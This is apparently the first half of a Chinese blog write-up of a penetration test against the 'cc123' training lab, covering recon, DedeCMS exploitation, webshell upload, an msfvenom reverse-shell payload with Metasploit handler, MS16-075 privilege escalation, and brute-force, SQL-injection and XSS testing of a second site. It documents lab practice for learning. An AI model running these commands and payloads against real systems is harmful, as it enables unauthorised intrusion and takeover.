首页 > 其他分享 >零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——上

零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——上

时间:2024-11-06 19:20:46浏览次数:3  
标签:网到 上传 http com cc123 扫描 点击 内网

一、网络环境示意图

二、环境搭建

首先将三个虚拟机使用VMware打开。

接下来对虚拟机进行配置。

首先配置虚拟机“护卫神主机大师(项目四)”。

点击编辑虚拟机设置。

发现存在两个网卡。

打开虚拟网络编辑器。

点击更改设置。

点击添加网络。

选择VM19后点击确定。

根据网络示意图,配置VM19,将其子网ip配置为:10.10.10.0,然后点击确定将配置保存。

根据网络示意图,用同样打方法添加VM18。

将其子网ip配置为:10.10.1.0,然后点击确定将配置保存。

将虚拟机“护卫神主机大师(项目四)”启动。点击“我已复制虚拟机”。

成功启动如下图所示。

接下来启动“SQL2008数据库(项目四)”。

成功启动如下图所示。

启动“目标机子(项目四)”。

成功启动如下图所示。

分别检查三台虚拟机的ip并测试连通性。

三、初步信息收集

启动kali。

创建“cc123”文件夹,方便后期存储。

扫描主机。

netdiscover -i eth0 -r 192.168.10.0/24

扫描到目标主机:192.168.10.134。

扫描主机的第二种方法。

nmap -sn 192.168.10.0/24

同样扫描到目标主机。

扫描前面发现的主机的端口。

masscan -p 1-65535 192.168.10.134 --rate=1000

使用nmap对上面扫描得到的端口进行详细的信息收集。

nmap -sC -A 192.168.10.134 -p 80,53,49154,6588,3389,135,21,51464,999 -oA cc123-port

发现80端口,尝试进行访问。

打开本地host文件进行域名绑定,加入ip及对应域名后保存文件。

文件路径:C:\Windows\System32\drivers\etc\hosts

ip及对应域名:192.168.10.134 www.cc123.com

绑定后访问域名。

域名:​​​​​​​www.cc123.com

发现999端口,尝试进行访问,发现是phpadmin。

发现6588端口,尝试进行访问,发现是主机大师。

进入“护卫神主机大师(项目四)”,点击管理面板->DNS,进行域名绑定。

右键后点击新建主机。

输入ip地址后点击添加主机即可。

前面kali内发现53端口,想到其可能存在DNS服务。

设置本地机网关。

DNS:192.168.10.134

此时就可以将前面绑定的域名删除,删除后再次将hosts文件保存。

ping网址www.cc123.com进行验证,可以看到指向的ip仍未192.168.10.134。

打开kali的resolv.conf文件进行域名绑定。

打开配置文件,将其修改为:192.168.10.134。

vi /etc/resolv.conf

修改后保存。

wq!

接下来扫描服务器看其是否存在子域名。

wfuzz -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt -u cc123.com -H "Host:FUZZ.cc123.com" --hw 53

对上面的扫描到的子域名依次进行访问。

至此可以得到子域名包括如下:

  • http://www.cc123.com
  • http://ww2.cc123.com
  • http://new.cc123.com

四、http://new.cc123.com漏洞发现

接下里对扫描到的域名进行漏洞检测。

首先检测http://new.cc123.com​​​​​​​。

根据其图标,发现其是织梦的cms。

查看其版本号。

http://new.cc123.com/data/admin/ver.txt

得到其版本为20150618,此版本存在漏洞。

接下来尝试访问其后台。

http://new.cc123.com/dede

尝试使用默认密码进行登录,但是登录失败了,因此尝试注册一个账号。

http://new.cc123.com/member

输入信息后点击注册。

直接点击完成注册。

注册完成。

从网页内获取cookie,将cookie填入到cookies.txt内。

点击系统设置,分类管理,添加分类。

成功添加分类。

利用exp跑出密码并解密,得到密码为:admin7788。

得到密码后重新来到后台,输入账号密码后点击登录。

发现成功登录到了后台。

点击文件式管理->根目录。

进入目录“a”。

点击文件上传。

选择木马文件并上传。

上传成功。

此时就可以访问到了。

五、利用蚁剑连接webshell

接下来使用蚁剑连接。

双击exe文件打开后进行初始化。

选择文件夹进行初始化。

初始化完成后即可打开工具。

右键后点击添加数据。

输入地址和密码后点击测试连接。

下图所示连接成功。

此时点击“添加”即可。

点击文件管理即可看到网站的整个目录。

效果如下图所示。

六、第一层Web服务器提权

.net文件权限比.php文件权限大,因此向“a”目录上传.net文件。

上传之后就可以进行访问了,密码为:admin。

测试可以执行cmd命令。

因此就可以上传一个攻击载荷进行操作。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.132 lport=12345 -f exe >s.exe

从kali内访问。

http://new.cc123.com/a/ASPXSpy2014.aspx

访问后找到c盘下的$Recycle.Bin文件夹上传文件。

将刚刚生成的exe文件尝试进行上传。

但是提示访问被拒绝。

所以上传wt.asp文件进行解决,其可以扫描可写目录。

上传成功。

成功上传后进行访问。

http://new.cc123.com/a/wt.asp

点击开始扫描。

根据扫描的结果,我们尝试上传到c:\windows\debug\WIA\路径下。

c:\windows\debug\WIA\

再次尝试进行上传。

上传成功。

接下来测试其能否执行。

打开msfconsole。

msfconsole

打开成功后利用handler模块设置监听。

use exploit/multi/handler

设置payload。

set payload windows/meterpreter/reverse_tcp

设置本地ip。

set lhost 192.168.10.132

设置监听端口。

set lport 12345

查看配置。

show options

执行exploit命令开始监听。

命令:exploit

开始监听后,执行前面上传的s.exe文件,输入路径后点击Submit。

/c c:\windows\debug\WIA\s.exe

根据浏览器正在加载判断已经开始执行了。

此时可以看到成功监听到了。

查看ip。

ipconfig

查看uid。

getuid

可以看到当前权限是普通权限,因此接下来要进行提权操作。

执行命令退出。

background

利用local_exploit_suggester模块查找本地是否存在提权漏洞。

use post/multi/recon/local_exploit_suggester

设置session。

set session 1

开始执行。

run

利用扫描到的exploit/windows/local/ms16_075_reflection_juicy提权。

use exploit/windows/local/ms16_075_reflection_juicy

查看所需配置。

show options

设置session。

set SESSION 1

开始执行。

exploit

执行完成后再次查看权限,可以看到此时已经拿到系统权限。

getuid

至此拿到了web服务器系统权限。

七、http://ww2.cc123.com漏洞发现

访问网址,获取其响应头信息。

http://ww2.cc123.com

可以获取到一系列信息。

对网站目录进行扫描。

gobuster dir -u http://ww2.cc123.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x 'aspx,html' -o cc123.log

根据扫描结果验证扫描到的文件是否存在。

根据网页内的文本框,可以猜测页面内存在XSS漏洞。

http://ww2.cc123.com/Message.aspx

找到其后台。

http://ww2.cc123.com/admin/Login.aspx

使用burp抓包。

将数据包发送到repeater。

进入到repeater后点击send放包。

右键后选择。

点击copy复制。

关闭代理后访问复制到的内容,重复访问后发现验证码可以重用,所以这里存在漏洞,可以尝试密码爆破。

右键数据包后将其发送到intruder。

点击clear。

将密码选中。

点击payloads添加字典。

加入字典本。

加入完成后点击Start attack开始测试。

等待爆破完成后,根据Length的不同即可成功获取到密码。

接下来尝试是否存在注入漏洞。

在用户名后面添加引号后放包,观察有无报错。

复制地址。

复制后到浏览器访问。

回到burp内尝试将用户名后面的部分注释掉,发现其进行了302跳转,由此猜测其可能存在注入。

可以看到其跳转到了后台。

用同样的方法复制地址后尝试访问,发现成功进入到后台内。

从后台可以看到还存在两个账号,但是看不到密码。

可以看到后台内存在留言功能,因此猜测是否存在XSS漏洞。

下面进行漏洞验证。

访问开始的时候扫描到的留言页面。

尝试是否存在XSS,输入完成后点击提交。

来到后台内查看。

选中后右键查看源代码。

可以看到确实存在XSS漏洞。

输入弹窗语句再次进行尝试。

再次进入到后台进行查看,发现成功弹窗。

因此就可以通过在前台留言内插入XSS代码,当管理员查看后就可以拿到管理员的cookie,进而可以实现登录后台。

继续观察后台,发现文件上传功能。

抓取数据包,看到可以修改文件名。

将数据包发送到repeater后,把文件名后缀修改成aspx放包进行尝试,发现其存在白名单验证。

因此想要通过文件上传的方式上传木马很难,所以思考有没有别的注入方式。


细节较多,篇幅较大,分为上/下两部分发布在两篇文章内

另一部分详见下面文章

零基础‘自外网到内网’渗透过程详细记录(cc123靶场)——下icon-default.png?t=O83Ahttps://blog.csdn.net/weixin_62808713/article/details/143575815


标签:网到,上传,http,com,cc123,扫描,点击,内网
From: https://blog.csdn.net/weixin_62808713/article/details/143572185

相关文章

  • Docker部署Portainer CE结合内网穿透实现容器的可视化管理与远程访问
    文章目录前言1.本地安装Docker2.本地部署PortainerCE3.公网远程访问本地Portainer-CE3.1内网穿透工具安装3.2创建远程连接公网地址4.固定PortainerCE公网地址前言本篇文章介绍如何在Ubuntu中使用docker本地部署PortainerCE可视化管理工具,并......
  • Narak靶机渗透 (Vulnhub内网渗透)
    一、渗透目标:DescriptionBacktotheTopNarakistheHinduequivalentofHell.YouareinthepitwiththeLordofHellhimself.CanyouuseyourhackingskillstogetoutoftheNarak?Burningwallsanddemonsarearoundeverycornerevenyourtrustytool......
  • Me-and-My-Girlfriend-1靶机渗透 (Vulnhub内网渗透)
    一、Me-and-My-Girlfriend-1:1、渗透目标:Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,wherethecouplewasoriginallyveryromantic,butsinceAliceworkedataprivatecompany,"CebanCorp",somethinghaschan......
  • 内网模块放开外网访问和 cdn
    确实,如果您的应用未来需要扩展到外网,直接在服务器上安装SSL/TLS证书,并通过Nginx将所有请求转换为HTTPS是基本的步骤。然而,为了确保平滑迁移和系统的长期可维护性,还有一些其他因素需要考虑:证书管理:证书获取:选择一个合适的证书颁发机构(CA)来获取SSL/TLS证书,或者使用像L......
  • 内网机安装docker
    1)关闭防火墙关闭systemctlstopfirewalld禁止开机启动防火墙systemctldisablefirewalld2).下载docker的安装包:可以直接使用该链接进行下载:https://download.docker.com/linux/static/stable/x86_64/docker-20.10.9.tgz也可访问官网选择匹配自己系统的版本进行下载:I......
  • NVR录像机汇聚管理EasyNVR多品牌NVR管理工具/设备在内网播放WebRTC流,显示一直加载中是
    在科技日新月异的今天,各行各业都在经历着前所未有的变革。视频监控技术,作为安全防范体系的重要组成部分,更是随着技术的演进不断升级,以适应更加复杂多变的安全需求。NVR录像机汇聚管理EasyNVR,作为一款集视频流处理、录像存储、分发管理等功能于一体的综合性视频监控云平台,正是这......
  • 内网穿透:基本概念和使用技巧
    一、为什么要使用内网穿透:内网穿透也称内网映射,简单来说就是让外网可以访问你的内网:把自己的内网(主机)当做服务器    让外网访问简而言之,就是我们在自己计算机上运行的程序,别人也可以通过公网直接访问,这样可以在项目发布到云服务器前,提供一个公网地址给用户进行体......
  • 内网穿透工具——NATAPP
    使用背景:我们有时候会在本地搭建个虚拟机,然后来运行程序,但是这样有一个弊端,外部用户无法访问虚拟机内的程序,这种情况有两种方法解决:一是使用云服务器,如:阿里云、腾讯云等;二是使用内网穿透工具,这样外部用户就可以轻松访问内网地址了。下面以NATAPP为例来实现内网穿透功能。......
  • 内网环回原理
    场景:当服务A和服务B都部署在同一个内网环境中,服务A试图通过服务B的公共IP地址进行请求。这种情况下,由于NAT环回的限制,可能会导致请求无法成功到达服务B。原理NAT设备通常维护两个个转换表,用于跟踪内网设备与公共IP地址之间的映射关系。分别是SNAT和DNAT,SNAT(......
  • SAS 在内网监控软件数据分析场景的应用
    随着企业信息化程度的不断提高,内网安全变得至关重要。内网监控软件能够收集大量的数据,而如何有效地分析这些数据以获取有价值的信息,成为了企业保障网络安全和优化网络性能的关键。SAS作为一款强大的数据分析工具,在处理内网监控软件数据方面具有显著的优势。本文将探讨SAS在内网......